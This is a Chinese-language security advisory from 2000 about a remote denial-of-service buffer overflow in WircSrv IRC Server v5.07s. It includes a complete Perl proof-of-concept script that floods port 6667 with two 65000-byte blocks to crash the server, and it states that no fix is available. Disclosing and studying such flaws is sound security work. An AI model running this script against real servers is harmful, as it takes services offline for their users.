WircSrv Irc Server 远程拒绝服务漏洞
发布日期:2000-07-11
更新日期:2000-07-11
受影响系统:
WircSrv Irc Server v5.07s
描述:
WircSrv Irc Server v5.07s存在一个远程拒绝服务漏洞。当向irc server监听的6667
端口发送超长的数据(超过65000字节长)时,将导致Irc server发生缓冲区溢出,并停止
响应。
<* 来源:Underground Security Systems Research (labs@ussrback.com)
http://www.ussrback.com
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
#########################################################
# Exploit by USSRLabs www.ussrback.com
# WircSrv Version 5.07s Remote DoS attack
# send 2 64k blocks of data causes the server to crash.
#########################################################
use Getopt::Std;
use Socket;
getopts('s:', \%args);
if(!defined($args{s})){&usage;}
my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);
$foo = "A"; # this is the NOP
$number = "65000"; # this is the total number of NOP
$data .= $foo x $number; # result of $foo times $number
$serv = $args{s}; # remote server
$port = 6667; # remote port, default is 6667
$buf = "$data"; # issue this response to the server
$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";
print S "$buf";
print("Data has been successfully sent to $serv\n");
sub usage {die("\n\nExploit by USSRLabs www.ussrback.com\nWircSrv
Version 5.07s
Remote DoS attack\nsend 2 64k blocks of data causes the server to
crash.\n -s server_ip\n\n");}
建议:
暂无
浏览次数:6066
严重程度:0(网友投票)